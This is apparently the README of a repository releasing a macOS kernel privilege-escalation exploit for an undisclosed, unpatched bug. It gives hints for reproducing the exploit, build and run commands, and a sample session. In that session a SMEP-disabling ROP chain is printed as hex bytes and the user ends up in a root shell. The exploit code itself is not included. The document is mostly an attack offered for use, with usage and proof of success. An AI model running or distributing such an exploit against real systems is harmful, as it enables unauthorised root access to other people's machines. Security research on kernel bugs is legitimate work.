macOS-Kernel-Exploit
General
macOS Kernel Exploit for CVE-????-???? (currently a 0day. I'll add the CVE# once it is published ;) ).
Thanks to @LinusHenze for this cool bug and his support ;P.
Writeup
Probably coming soon. If you want to try and exploit it yourself, here are a few things to get you started:
- VM: Download the macOS installer from the appstore and drag the
.appfile into VMWare'sNEW VMwindow - Kernel Debugging setup: http://ddeville.me/2015/08/using-the-vmware-fusion-gdb-stub-for-kernel-debugging-with-lldb
- Have a look at the _kernel_trap function
Build
You will need XCODE <= 9.4.1 to build the exploit. (It needs to be 32bit)
make
Execution
./exploit <KASLR slide>
NOTE: a KASLR leak is required in order for the exploit to do more that just freezing the system so it's not that bad :)
Example:
[debug@Kernel-Mac Shared ]$ ./exploit 0x1600000
[*] Kernel slide: 0x1600000
[*] uid=0x1f5 euid=0x1f5 gid=0x14 egid=0x14
[*] Mapped NULL Page to catch GS accesses
[*] Fake Thread is at: 0x10000
[*] Fake Stack is at: 0x5d000000
[+] SAVED_STATE32 setup done!
[DEBUG] escalatePrivs: 0xa7b39
[DEBUG] SMEP disable ROP-Chain:
70 92 82 01 80 FF FF FF E0 06 06 00 00 00 00 00 | p...............
13 B6 A0 01 80 FF FF FF 39 7B 0A 00 00 00 00 00 | ........9{......
[DEBUG] Waiting...
[+] Here we go...
[+] Userland shellcode says hi!
[*] Patched uid=0x0 euid=0x0 gid=0x14 egid=0x14
bash-3.2#